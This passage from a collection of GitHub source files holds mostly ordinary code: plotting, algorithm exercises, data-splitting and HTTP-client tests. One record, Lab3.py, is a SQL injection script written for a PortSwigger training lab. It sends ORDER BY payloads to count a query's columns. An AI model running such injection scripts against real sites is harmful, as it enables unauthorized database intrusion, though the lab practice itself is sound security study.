markersize=size)\n plt.legend(('MOC', 'MUSCL-32', 'MUSCL-64', \\\n 'MUSCL-128', 'MUSCL-256', 'MUSCL-512'))\n 
plt.grid()\n plt.xlim((1, 1.14))\n plt.ylim((0, 0.65))\n plt.ylabel('$z_{C_1}$')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_zC1_MUSCL.png')\n\n plt.figure(6)\n plt.plot(x_zC1_MOC, zC1_MOC, 'k')\n #plt.plot(x_8, Sg_FOU_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_FOU_16, '-y', mfc='none')\n plt.plot(x_32, zC1_FOU_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, zC1_FOU_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, zC1_FOU_128, '-mD', mfc='none', markersize=size)\n plt.plot(x_256, zC1_FOU_256, '-cs', mfc='none', markersize=size)\n plt.plot(x_512, zC1_FOU_512, '-rv', mfc='none', markersize=size)\n plt.legend(('MOC', 'FOU-32', 'FOU-64', \\\n 'FOU-128', 'FOU-256', 'FOU-512'))\n plt.grid()\n plt.xlim((1, 1.14))\n plt.ylim((0, 0.65))\n plt.ylabel('$x_{C_1}')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_zC1_FOU.png')\n\n plt.figure(7)\n x = np.log10(np.array([32,64,128,256,512]))\n eL1_FOU = np.log10(np.array([e32_L1_FOU, e64_L1_FOU, \\\n e128_L1_FOU, e256_L1_FOU, e512_L1_FOU]))\n eL1_MUSCL = np.log10(np.array([e32_L1_MUSCL, e64_L1_MUSCL, \\\n e128_L1_MUSCL, e256_L1_MUSCL, e512_L1_MUSCL]))\n y = -x\n plt.plot(x, eL1_FOU, '-ro', mfc='none', markersize=size)\n plt.plot(x, eL1_MUSCL, '-gs', mfc='none', markersize=size)\n plt.plot(x,y,'k')\n plt.legend(('FOU', 'MUSCL', 'Primeira Ordem'))\n plt.grid()\n plt.ylabel('$log(E_{L1})$')\n plt.xlabel('log($n_b$)')\n plt.savefig('results/compositional/TCC2/5k_eL1_zCO2.png')\n\n plt.figure(8)\n x = (np.array([32,64,128,256,512]))\n t_FOU = (np.array([t32_FOU, t64_FOU, \\\n t128_FOU, t256_FOU, t512_FOU]))\n t_MUSCL = (np.array([t32_MUSCL, t64_MUSCL, \\\n t128_MUSCL, t256_MUSCL, t512_MUSCL]))\n plt.plot(x, t_FOU, '-ro', mfc='none', markersize=size)\n plt.plot(x, t_MUSCL, '-gs', mfc='none', markersize=size)\n plt.legend(('FOU', 'MUSCL', 'Primeira Ordem'))\n plt.grid()\n plt.ylabel('Tempo computacional [s]')\n plt.xlabel('Número de volumes de controle')\n plt.savefig('results/compositional/TCC2/5k_time.png')\n\n plt.figure(9)\n x = (np.array([32,64,128,256,512]))\n t_FOU = (np.array([t32_FOU, t64_FOU, \\\n t128_FOU, t256_FOU, t512_FOU, t1024_FOU]))\n t_MUSCL = (np.array([t32_MUSCL, t64_MUSCL, \\\n t128_MUSCL, t256_MUSCL, t512_MUSCL]))\n eL1_FOU = (np.array([e32_L1_FOU, e64_L1_FOU, \\\n e128_L1_FOU, e256_L1_FOU, e512_L1_FOU, e1024_L1_FOU]))\n eL1_MUSCL = (np.array([e32_L1_MUSCL, e64_L1_MUSCL, \\\n e128_L1_MUSCL, e256_L1_MUSCL, e512_L1_MUSCL]))\n size_FOU = 7\n size_MUSCL = 7\n #plt.plot(t_FOU,eL1_FOU, '-ro', mfc='none', markersize=size)\n #plt.plot(t_MUSCL,eL1_MUSCL, '-gs', mfc='none', markersize=size)\n plt.plot(t32_FOU, e32_L1_FOU, '-ro', mfc='none', markersize=size_FOU)\n plt.plot(t32_MUSCL, e32_L1_MUSCL, '-go', mfc='g', markersize=size_MUSCL)\n plt.plot(t64_FOU, e64_L1_FOU, '-rs', mfc='none', markersize=size_FOU)\n plt.plot(t64_MUSCL, e64_L1_MUSCL, '-gs', mfc='g', markersize=size_MUSCL)\n plt.plot(t128_FOU, e128_L1_FOU, '-rv', mfc='none', markersize=size_FOU)\n plt.plot(t128_MUSCL, e128_L1_MUSCL, '-gv', mfc='g', markersize=size_MUSCL)\n plt.plot(t256_FOU, e256_L1_FOU, '-rp', mfc='none', markersize=size_FOU)\n plt.plot(t256_MUSCL, e256_L1_MUSCL, '-gp', mfc='g', markersize=size_MUSCL)\n plt.plot(t512_FOU, e512_L1_FOU, '-rD', mfc='none', markersize=size_FOU)\n plt.plot(t512_MUSCL, e512_L1_MUSCL, '-gD', mfc='g', markersize=size_MUSCL)\n plt.plot(t1024_FOU, e1024_L1_FOU, '-r*', mfc='none', markersize=size_FOU)\n plt.plot(t2048_FOU, e2048_L1_FOU, '-r<', mfc='none', markersize=size_FOU)\n 
legend_elements = [Line2D([0], [0], color='g', label='MUSCL'),\n Line2D([0], [0], color='w', markerfacecolor='g', marker='o', markeredgecolor='g', label='32 CV', markersize=size_MUSCL),#, mfc='none'),\n Line2D([0], [0], marker='s', color='w', markerfacecolor='g', label='64 CV', markeredgecolor='g', markersize=size_MUSCL),#, mfc='none'),\n Line2D([0], [0], marker='v', color='w', markerfacecolor='g',label='128 CV',markeredgecolor='g', markersize=size_MUSCL),#, mfc='none'),\n Line2D([0], [0], marker='p', color='w', markerfacecolor='g', label='256 CV',markeredgecolor='g', markersize=size_MUSCL),#, mfc='none'),\n Line2D([0], [0], marker='D', color='w', markerfacecolor='g', label='512 CV',markeredgecolor='g', markersize=size_MUSCL),#, mfc='none'),\n Line2D([0], [0], marker='D', color='w', markerfacecolor='none', label=' ',markeredgecolor='w', markersize=size_MUSCL),#, mfc='none'),\n Line2D([0], [0], marker='D', color='w', markerfacecolor='none', label=' ',markeredgecolor='w', markersize=size_MUSCL),#, mfc='none'),\n Line2D([0], [0], color='r', label='FOU'),\n Line2D([0], [0], color='w', marker='o', markeredgecolor='r', label='32 CV', markersize=size_FOU, mfc='none'),\n Line2D([0], [0], marker='s', color='w', label='64 CV', markeredgecolor='r', markersize=size_FOU, mfc='none'),\n Line2D([0], [0], marker='v', color='w', label='128 CV',markeredgecolor='r', markersize=size_FOU, mfc='none'),\n Line2D([0], [0], marker='p', color='w', label='256 CV',markeredgecolor='r', markersize=size_FOU, mfc='none'),\n Line2D([0], [0], marker='D', color='w', label='512 CV',markeredgecolor='r', markersize=size_FOU, mfc='none'),\n Line2D([0], [0], marker='*', color='w', label='1024 CV',markeredgecolor='r', markersize=size_FOU, mfc='none'),\n Line2D([0], [0], marker='<', color='w', label='2048 CV',markeredgecolor='r', markersize=size_FOU, mfc='none'),]\n # Create the figure\n plt.legend(handles=legend_elements, ncol=2,)\n #plt.legend(('FOU', 'MUSCL', 'First Order'))\n plt.grid()\n plt.xlabel('Tempo computacional [s]')\n plt.ylabel('$E_{L1}$')\n plt.xscale('log')\n plt.yscale('log')\n plt.savefig('results/compositional/TCC2/5k_time_eL1.png')\n\n\n plt.figure(10)\n plt.plot(x_4000, zCO2_FOU_4000, 'k')\n #plt.plot(x_8, Sg_MUSCL_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_MUSCL_16, '-y', mfc='none')\n plt.plot(x_32, zCO2_MUSCL_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, zCO2_MUSCL_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, zCO2_MUSCL_128, '-mD', mfc='none', markersize=size)\n plt.plot(x_256, zCO2_MUSCL_256, '-cs', mfc='none', markersize=size)\n #plt.plot(x_512, zCO2_MUSCL_512, '-rv', mfc='none', markersize=size)\n plt.legend(('FOU-4000', 'MUSCL-32', 'MUSCL-64', \\\n 'MUSCL-128', 'MUSCL-256'), loc=3)\n plt.grid()\n plt.xlim((0, 1.1))\n plt.ylim((0.75, 1))\n plt.ylabel('$z_{CO_2}$')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_zCO2_MUSCL.png')\n\n plt.figure(11)\n plt.plot(x_4000, zCO2_FOU_4000, 'k')\n #plt.plot(x_8, Sg_FOU_8, '-r', mfc='none')\n #plt.plot(x_16, Sg_FOU_16, '-y', mfc='none')\n plt.plot(x_32, zCO2_FOU_32, '-go', mfc='none', markersize=size)\n plt.plot(x_64, zCO2_FOU_64, '-bp', mfc='none', markersize=size)\n plt.plot(x_128, zCO2_FOU_128, '-mD', mfc='none', markersize=size)\n plt.plot(x_256, zCO2_FOU_256, '-cs', mfc='none', markersize=size)\n #plt.plot(x_512, zCO2_FOU_512, '-rv', mfc='none', markersize=size)\n plt.legend(('FOU-4000', 'FOU-32', 'FOU-64', \\\n 'FOU-128', 'FOU-256'), loc=3)\n plt.grid()\n plt.xlim((0, 1.1))\n plt.ylim((0.75, 1))\n 
plt.ylabel('$z_{CO_2}$')\n plt.xlabel('Distância')\n plt.savefig('results/compositional/TCC2/5k_zCO2_FOU.png')\n\n import pdb; pdb.set_trace()\n","repo_name":"DudaGalindo/compositional_adm","sub_path":"case_1d_5k_MM_convergence.py","file_name":"case_1d_5k_MM_convergence.py","file_ext":"py","file_size_in_byte":28962,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
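The long convergence script in the record above repeatedly computes the observed order of convergence as `math.log(e_coarse / e_fine, 2)` each time the cell count doubles. The same bookkeeping in one small helper (an editorial sketch, not code from the repo):

```python
import math

def observed_order(errors):
    """errors[i] is the L1 error on a mesh with twice the cells of errors[i-1]."""
    return [math.log(errors[i - 1] / errors[i], 2) for i in range(1, len(errors))]

print(observed_order([0.08, 0.04, 0.02]))  # ~[1.0, 1.0], i.e. first order
```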
+{"seq_id":"30723679552","text":"#!/usr/bin/python3\n\n#by Davinci\n#Lab3: SQL injection UNION attack, determining the number of columns returned by the query\n#https://portswigger.net/\n\nfrom pwn import *\nimport sys\nimport requests\nimport signal, time\nfrom bs4 import BeautifulSoup\nimport urllib3\n\n#HttpsNoWarning\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n#ctrl_fuction\n\ndef ctrl_Fuction(sig, frames):\n\tprint(\"[!]Saliendo...\")\n\tsys.exit(1)\n\nsignal.signal(signal.SIGINT, ctrl_Fuction)\n\n#Proxies\n\nproxies = { 'http':'127.0.0.1:8080', 'https':'127.0.0.1:8080'}\n\ndef sql_UnionExploit(url):\n\turi = \"filter?category=\"\n\tbar = log.progress(\"[!] Iniciando Injection\")\n\tbar.status(\"[!] Determinando el numero de columnas\")\n\n\tfor i in range(1,50):\n\t\tpayload = \"'+order+by+%s--\" %i\n\t\tr = requests.get(url + uri + payload, verify=False, proxies=proxies)\n\t\tresp = r.text\n\t\tif \"Internal Server Error\" in resp:\n\t\t\treturn i - 1\n\t\telse:\n\t\t\ti += 1\n\treturn False\n\n#functionhelPanel\ndef helPanel():\n\tprint(\"[!]Usage %s \" %sys.argv[0])\n\tprint(\"[!] Example python3 %s www.mipagina.com \" %sys.argv[0])\n\n\nif __name__ == '__main__':\n\ttry:\n\t\turl = sys.argv[1].strip()\n\texcept IndexError:\n\t\thelPanel()\n\n\tnum_column= sql_UnionExploit(url)\n\t\n\tif num_column:\n\t\tprint(\"[!] El numero de columna es: %s \" %num_column)\n\telse:\n\t\tprint(\"[!] La injection no fue exitosa\")\n","repo_name":"DaVinciRoot/SQLi-Labs-Scripts","sub_path":"Lab3.py","file_name":"Lab3.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39829708836","text":"# given a string s, partition the string so that each letter appears only in one partition\n# find the range of each letter in the str and update the right pointer \n# if new_letter appears within prev one's, we have to include it\n# map store the last apearance position of a letter\nclass Solution:\n def partitionLabels(self, s: str) -> List[int]: \n myMap = collections.defaultdict(int)\n for index, l in enumerate(s): \n myMap[l] = index\n result = []\n left, right = 0, -1\n for index, l in enumerate(s):\n if myMap[l]>right: \n right = myMap[l]\n if index==right: \n result.append(right-left+1)\n left = right+1 \n return result\n","repo_name":"MaTasty/Grind","sub_path":"partitionLabels.py","file_name":"partitionLabels.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17815058187","text":"import pandas as pd\nimport numpy as np\nimport os\nfrom utils import shift\nimport argparse\nfrom sklearn.model_selection import train_test_split\n\n\n\t\ndef Split(train_size,price_only,shift_param,per_change, features = [\"Open\",\"High\",\"Low\",\"Close\"],save = True):\n\tdf = pd.read_csv(\"Datasets/final_Bitcoin_dataset.csv\",index_col = 0)\n\tif per_change:\n\t\tgls = \"change in price\"\n\telse:\n\t\tgls = \"Weighted_Price\"\n\tif price_only:\n\t\tX = df[\"Weighted_Price\"][:-1]\n\telse:\n\t\tX = df[features][:-1]\n\ty = df[gls][:-1]\n\tX_train, X_test, y_train, y_test = train_test_split(X,y,\n shuffle = False,\n train_size = train_size)\n\ttry : \n\t\tos.mkdir(\"Datasets/split\")\n\texcept:\n\t\t1\n\n\tX_train,y_train = shift(X_train,y_train,shift_param)\n\tX_test,y_test = shift(X_test,y_test,shift_param)\n\t\t\t\n\tif save:\n\t\tnp.save(\"./Datasets/split/X_train.npy\",X_train)\n\t\tnp.save(\"./Datasets/split/X_test.npy\",X_test)\n\t\tnp.save(\"./Datasets/split/y_train.npy\",y_train)\n\t\tnp.save(\"./Datasets/split/y_test.npy\",y_test)\n\telse:\n\t\treturn X_train,y_train\n\n\n\ndef main(train_size,price_only,shift_param,per_change):\n\n\tSplit(train_size,price_only,shift_param,per_change)\n\n\t\nif __name__ == '__main__':\n main()\n","repo_name":"ea137/Comparative-Study-of-Prediction-Models-in-Bitcoin-Forecasting-and-Resolve-of-The-Bounds-Limitation","sub_path":"dataSplitting.py","file_name":"dataSplitting.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"22239882229","text":"# Definimos una lista que contiene las etiquetas de los cuadrantes y el mensaje para el origen del sistema de coordenadas.\ncuadrantes = ['Origen', 'Eje Y', 'Eje X', 'Cuadrante I', 'Cuadrante II', 'Cuadrante III', 'Cuadrante IV']\n\n# Creamos un bucle infinito usando \"while True\" para que el programa se repita continuamente hasta que se rompa.\nwhile True:\n # Solicitamos al usuario que ingrese los valores de 'x' e 'y' y los convertimos a enteros usando int().\n x = int(input('Ingresa el valor de x: '))\n y = int(input('Ingresa el valor de y: '))\n\n # Evaluamos las coordenadas para determinar en qué cuadrante se encuentra el punto.\n if x == 0 and y == 0:\n print(cuadrantes[0]) # Si ambos valores son cero, el punto está en el origen.\n elif x == 0:\n print(cuadrantes[1]) # Si 'x' es cero, el punto está en el eje Y.\n elif y == 0:\n print(cuadrantes[2]) # Si 'y' es cero, el punto está en el eje X.\n elif x > 0 and y > 0:\n print(cuadrantes[3]) # Si 'x' e 'y' son mayores que cero, el punto está en el Cuadrante I.\n elif x < 0 and y > 0:\n print(cuadrantes[4]) # Si 'x' es menor que cero y 'y' es mayor que cero, el punto está en el Cuadrante II.\n elif x < 0 and y < 0:\n print(cuadrantes[5]) # Si ambos valores son menores que cero, el punto está en el Cuadrante III.\n elif x > 0 and y < 0:\n print(cuadrantes[6]) # Si 'x' es mayor que cero y 'y' es menor que cero, el punto está en el Cuadrante IV.\n else:\n print('El punto está en el origen del sistema de coordenadas.') # Si ninguna condición se cumple, el punto está en el origen.\n\n # Preguntamos al usuario si desea hacer otra consulta o no, almacenando su respuesta en la variable 'continuar'.\n continuar = input(\"¿Deseas hacer otra consulta? (s/n): \")\n\n # Comparamos la respuesta del usuario con 's' (sin importar si está en mayúscula o minúscula).\n # Si la respuesta no es 's', rompemos el bucle usando \"break\" y finalizamos el programa.\n if continuar.lower() != 's':\n break\n","repo_name":"JetsemaniHidalgo/UnidadM2","sub_path":"Cuadrantes.py","file_name":"Cuadrantes.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29182941777","text":"# coding: utf-8\nfrom __future__ import print_function\n\nimport errno\nimport socket\nimport contextlib\nimport concurrent.futures\nimport itertools\n\nimport tornado.gen\nimport tornado.web\nimport tornado.httpserver\nimport pytest\n\nimport pyneh\n\nOK = \"OK\"\n\n\nclass EchoHandler(tornado.web.RequestHandler):\n\n def get(self):\n self.set_header(\"X-Yandex\", \"test\")\n self.write(OK)\n self.finish()\n\n def post(self):\n self.write(self.request.body)\n self.finish()\n\n\nclass HeaderHandler(tornado.web.RequestHandler):\n\n def post(self):\n assert self.request.headers.get(\"X-Yandex\") == \"something\"\n assert self.request.headers.get(\"Content-Type\") == \"application/json\"\n self.write(\"bob\")\n self.finish()\n\n\nclass SleepHandler(tornado.web.RequestHandler):\n\n @tornado.gen.coroutine\n def get(self):\n yield tornado.gen.sleep(int(self.get_argument(\"timeout\", default=\"0\")))\n self.write(OK)\n self.finish()\n\n\nclass BadHandler(tornado.web.RequestHandler):\n\n def get(self):\n self.set_status(503)\n self.finish()\n\n\n@pytest.yield_fixture\ndef server_address(io_loop):\n app = tornado.web.Application([\n (r\"/post\", EchoHandler),\n (r\"/get\", EchoHandler),\n (r\"/header\", HeaderHandler),\n (r\"/sleep\", SleepHandler),\n (r\"/error\", BadHandler)\n ])\n server = tornado.httpserver.HTTPServer(app, io_loop=io_loop)\n\n sock = socket.socket(socket.AF_INET6)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)\n sock.setblocking(0)\n sock.bind((\"::\", 0))\n sock.listen(128)\n server.add_sockets([sock])\n\n try:\n yield \"[::1]:{0}\".format(sock.getsockname()[1])\n finally:\n server.stop()\n sock.close()\n\n\n@pytest.fixture\ndef thread_pool():\n return concurrent.futures.ThreadPoolExecutor(max_workers=1)\n\n\n@pytest.fixture\ndef requester():\n return pyneh.Requester()\n\n\ndef assert_that_response_is_good(response):\n assert response is not None and response.ready and not response.failed\n\n\ndef assert_that_response_data_equal_to(response, data):\n assert response.data == data and response.status_code == 0 and response.error_code == 0\n\n\ndef test_empty_requester(requester):\n assert not list(requester.iterate(0.001))\n\n\ndef test_bad_schema(requester):\n with pytest.raises(Exception):\n requester.add(\"wrong://schema\")\n\n\ndef test_options(requester):\n requester.set_connect_timeout(\"5s\")\n requester.set_slow_connect(\"100ms\")\n\n with pytest.raises(Exception):\n requester.set_connect_timeout(\"wrong\")\n\n with pytest.raises(Exception):\n requester.set_slow_connect(\"wrong\")\n\n\n@pytest.mark.gen_test\ndef test_get_request(requester, server_address, thread_pool):\n requester.add(\"http://{}/get\".format(server_address))\n response = yield thread_pool.submit(requester.wait)\n assert_that_response_is_good(response)\n assert_that_response_data_equal_to(response, OK)\n assert response.duration\n assert dict(response.headers).get(\"X-Yandex\") == \"test\"\n\n\n@pytest.mark.gen_test\ndef test_post_request(requester, server_address, thread_pool):\n body = b\"something\\x00somewhere\"\n requester.add(\"post://{}/post\".format(server_address), data=body)\n response = yield thread_pool.submit(requester.wait)\n assert_that_response_is_good(response)\n assert_that_response_data_equal_to(response, body)\n\n\n@pytest.mark.gen_test\ndef test_http_request(requester, server_address, thread_pool):\n request = pyneh.HttpRequest(\"http://{}/header\".format(server_address))\n 
requester.add_request(request.set_content(\"alice\").set_content_type(\"application/json\").add_header(\"X-Yandex\", \"something\"))\n response = yield thread_pool.submit(requester.wait)\n assert_that_response_is_good(response)\n assert_that_response_data_equal_to(response, \"bob\")\n\n\n@pytest.mark.gen_test\ndef test_wait_timeout(requester, server_address, thread_pool):\n requester.add(\"http://{}/sleep?timeout=10\".format(server_address))\n response = yield thread_pool.submit(requester.wait, 0.1)\n assert response is None\n\n\n@pytest.mark.gen_test\ndef test_request_timeout(requester, server_address, thread_pool):\n requester.add(\"http://{}/sleep?timeout=10\".format(server_address), timeout=0.1)\n response = yield thread_pool.submit(requester.wait)\n assert response is not None and response.ready\n assert response.failed and response.cancelled\n assert response.error_text\n\n\n@pytest.mark.gen_test\ndef test_request_cancel(requester, server_address, thread_pool):\n group_id = requester.reserve_group_id()\n requester.add_to_group(\"http://{}/sleep?timeout=10\".format(server_address), group_id, timeout=10)\n response = yield thread_pool.submit(requester.wait, 0.1)\n assert response is None\n requester.cancel_group(group_id)\n response = yield thread_pool.submit(requester.wait)\n assert response is not None and response.ready\n assert response.failed and response.cancelled\n assert response.error_text\n\n\n@pytest.mark.gen_test\ndef test_failing_request(requester, server_address, thread_pool):\n requester.add(\"http://{}/error\".format(server_address))\n response = yield thread_pool.submit(requester.wait)\n assert response is not None and response.ready\n assert response.failed and response.status_code == 503 and response.error_text\n\n\n@pytest.mark.gen_test\ndef test_payload(requester, server_address, thread_pool):\n payload = object()\n requester.add(\"http://{}/get\".format(server_address), payload=payload)\n response = yield thread_pool.submit(requester.wait)\n assert_that_response_is_good(response)\n assert response.payload is payload\n\n\n@pytest.mark.gen_test\ndef test_multiple_requests(requester, server_address, thread_pool):\n count = 10\n for idx in xrange(count):\n requester.add(\"http://{}/get\".format(server_address), payload=idx)\n responses = yield thread_pool.submit(lambda it: list(itertools.islice(it, count)), requester.iterate())\n assert {resp.payload for resp in responses} == {idx for idx in xrange(count)}\n for resp in responses:\n assert_that_response_is_good(resp)\n\n\n@pytest.mark.gen_test\ndef test_reusing(requester, server_address, thread_pool):\n for _ in xrange(3):\n requester.add(\"http://{}/get\".format(server_address))\n response = yield thread_pool.submit(requester.wait)\n assert_that_response_is_good(response)\n\n\ndef test_error_code(requester):\n with contextlib.closing(socket.socket(socket.AF_INET6)) as sock:\n sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)\n sock.bind((\"::\", 0))\n port = sock.getsockname()[1]\n requester.add(\"http://[::1]:{}/\".format(port))\n response = requester.wait()\n assert response is not None and response.ready and response.failed\n assert response.error_code == errno.ECONNREFUSED and not response.status_code\n\n\ndef test_mlock():\n try:\n pyneh.lock_all_memory()\n except RuntimeError:\n # TODO: test it properly\n 
pass\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"infra/tests/test_bindings.py","file_name":"test_bindings.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"25195831930","text":"#!/usr/bin/env python\n\nimport bs4\nimport glob\nimport json\nimport os\nimport requests\nimport time\n\n\nAPI_KEY = os.getenv('ANTIPLAGIAT_API_KEY')\nTOOL = 'antiplagiat-online'\n\nreports = [f.replace('./report/', '') for f in glob.glob('./report/*.json')]\ntopics = [f.replace('./data/', '') for f in glob.glob('./data/*.json')]\n\n\ndef validate(topic: str) -> None:\n start = time.time()\n\n text: str\n with open(f'./data/{topic}', 'r') as rfile:\n content = json.load(rfile)['steps'][0]['block']['text']\n text = bs4.BeautifulSoup(content, features='lxml').text\n text = text[4:] if text.startswith('
') else text\n text = text[5:] if text.startswith('') else text\n\n response = requests.post(\n f'https://be1.ru/api/tools/add-task?apikey={API_KEY}',\n data={'tool': TOOL, 'text': text[:10000]}\n )\n print(response.json())\n slug = response.json()['slug']\n\n print(f'time spent to get slug={slug}: {time.time() - start}')\n\n for _ in range(100):\n result = requests.get(\n f'https://be1.ru/api/tools/get-result?apikey={API_KEY}&tool={TOOL}&slug={slug}',\n )\n if not result.json().get('result'):\n print(f'time spent position={result.json().get(\"position\")}: {time.time() - start}')\n time.sleep(.2)\n continue\n print(f'time spent to get final result: {time.time() - start}')\n with open(f'./report/{topic}', 'wb') as out:\n out.write(result.content)\n break\n\n\nfor topic in [topic for topic in topics if topic not in reports][:85]:\n validate(topic)\n","repo_name":"ant1k9/hs-perfect-topic","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15314030854","text":"#!/usr/bin/env python3\nimport requests\nimport os\n\nurl = \"http://pic29.photophoto.cn/20131204/0034034499213463_b.jpg\"\npath = os.getcwd()\nphname = path + '\\\\1-' + url.split('/')[-1]\n\ntry:\n\tuag = {'user-agent':'Chrome/66.0.3359.117'}\n\tr = requests.get(url,headers=uag)\n\tr.raise_for_status()\n\t\n\twith open(phname,'wb') as f:\n\t\tf.write(r.content)\n\t\tf.close()\n\t\tprint('Sucessed')\nexcept:\n\tprint(\"Wrong\")\n\n","repo_name":"liujx42/python-WebCrawlerLearning","sub_path":"MOOC/1-photo_request_test.py","file_name":"1-photo_request_test.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"19552144520","text":"import os\nimport subprocess\nimport glob\n\nalgos = ['dfs', 'bfs', 'ucs', 'astar', 'mm0', 'mm']\nlayouts = []\nflag = 0\n\nfor file in os.listdir('layouts_selective'):\n if flag!=0:\n layouts.append(file.split('.')[0])\n flag = 1\nlist_of_files = sorted(layouts)\nfrom pdb import set_trace as bp\n#bp()\n# print(list_of_files)\nselected_layouts = ['mediumMaze','mediumCorners','trickySearch']\nlegnth = [11,11,8]\nfor run in range(0,3):\n results = {}\n values = []\n for algo in algos:\n temp = []\n for layout in range(1,legnth[run]):\n count = 0\n # if 'mediumMaze' not in layout:\n # if 'mediumCorners' not in layout:\n # if 'trickySearch' not in layout:\n #print(layout)\n # if selected_layouts[run] not in layout:\n # continue\n command_str = 'python3 pacman.py -l layouts_selective/' + selected_layouts[run] + '_' + str(layout) + '.lay -p SearchAgent -a fn=' + algo\n\n if 'Corners' in selected_layouts[run]:\n command_str = command_str + ',prob=CornersProblem'\n if algo != 'mm0':\n command_str = command_str + ',heuristic=cornersHeuristic'\n\n elif 'Search' in selected_layouts[run] or 'Dotted' in selected_layouts[run]:\n command_str = command_str + ',prob=FoodSearchProblem'\n if algo != 'mm0':\n command_str = command_str + ',heuristic=foodSearchHeuristic'\n\n elif algo == 'astar' or algo == 'mm':\n command_str = command_str + ',heuristic=manhattanHeuristic'\n\n if 'Classic' in selected_layouts[run]:\n continue\n\n command_str = command_str + ' --frameTime 0.001 -q'\n print(command_str)\n result = subprocess.run(command_str.split(' '), capture_output=True).stdout.decode()\n\n cost = int(str(result).split('Path found with total cost of')[1].split('in')[0])\n from pdb import set_trace as bp\n\n # bp()\n time = float(\n str(result).split('Path found with total cost of')[1].split('in')[1].split('seconds')[0]) * 1000.00\n nodes_exp = int(result.split('Search nodes expanded:')[1].split('\\n')[0])\n score = int(result.split('Score:')[1].split('\\n')[0])\n\n results[(algo, selected_layouts[run]+ '_' + str(layout))] = [cost, nodes_exp, score, time]\n temp.append(nodes_exp)\n values.append(temp)\n\n final_list = []\n for key in results.keys():\n print(key, results[key])\n final_list.append([key[0], key[1], results[key][0], results[key][1], results[key][2], results[key][3]])\n\n import csv\n\n header = ['Algo', 'environment', 'Path cost', 'Nodes expanded', 'Score', 'Time']\n header2 = ['T-test Results with MM', 'DFS', 'BFS', 'UCS', 'ASTAR', 'MM0']\n\n from scipy import stats\n\n t_value_list = []\n p_value_list = []\n '''for i in range(len(values)):\n temp_t = []\n temp_p = []\n for j in range(len(values)):\n t_value,p_value = stats.ttest_ind(values[j], values[i])\n t_value_list.append(t_value)\n p_value_list.append(p_value)\n temp_p.append(p_value/2)\n temp_t.append(t_value)\n t_value_list.append(temp_t)\n p_value_list.append(temp_p)'''\n\n t_value_list.append('T_value')\n p_value_list.append('P_value')\n\n for i in range(len(values)):\n print(values[i])\n for i in range(len(values)-1):\n t_value, p_value = stats.ttest_ind(values[i], values[-1])\n t_value_list.append(t_value)\n p_value_list.append(p_value)\n\n print(t_value_list)\n print(p_value_list)\n\n with open(selected_layouts[run] + '_output.csv', 'w', encoding='UTF8') as f:\n writer = csv.writer(f)\n\n # write the header\n writer.writerow(header)\n\n # write the data\n for line in final_list:\n writer.writerow(line)\n writer.writerow(header2)\n writer.writerow(t_value_list)\n 
writer.writerow(p_value_list)","repo_name":"navyasri1/AI_Project","sub_path":"1.search/selected_layout_run.py","file_name":"selected_layout_run.py","file_ext":"py","file_size_in_byte":4081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"41054239878","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 5 11:43:25 2022\n\n@author: ExoFlare\n\"\"\"\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndatasets = ['complex_1', 'complex_2', 'complex_3', 'complex_4', 'complex_5', 'complex_6', 'complex_7', 'complex_8', 'complex_9', 'complex_10',\n\t'complex_11', 'complex_12', 'complex_13', 'complex_14', 'complex_15', 'complex_16',\n 'complex_17', 'complex_18', 'complex_19', 'complex_20', 'high-noise_1', 'high-noise_2', 'high-noise_3',\n\t'high-noise_4', 'high-noise_5', 'high-noise_6', 'high-noise_7', 'high-noise_8', 'high-noise_9', \n\t'high-noise_10', 'high-noise_11', 'high-noise_12', 'high-noise_13', \n 'high-noise_14', 'high-noise_15', 'high-noise_16', 'high-noise_17', 'high-noise_18', 'high-noise_19', 'high-noise_20', \n 'dens-diff_1', 'dens-diff_2', 'dens-diff_3', 'dens-diff_4', 'dens-diff_5', 'dens-diff_6', 'dens-diff_7', 'dens-diff_8',\n\t'dens-diff_9', 'dens-diff_10', 'dens-diff_11', 'dens-diff_12', 'dens-diff_13', 'dens-diff_14', 'dens-diff_15', 'dens-diff_16', \n 'dens-diff_17', 'dens-diff_18', 'dens-diff_19', 'dens-diff_20',\n\t'low-noise_1', 'low-noise_2', 'low-noise_3', 'low-noise_4', 'low-noise_5', 'low-noise_6', 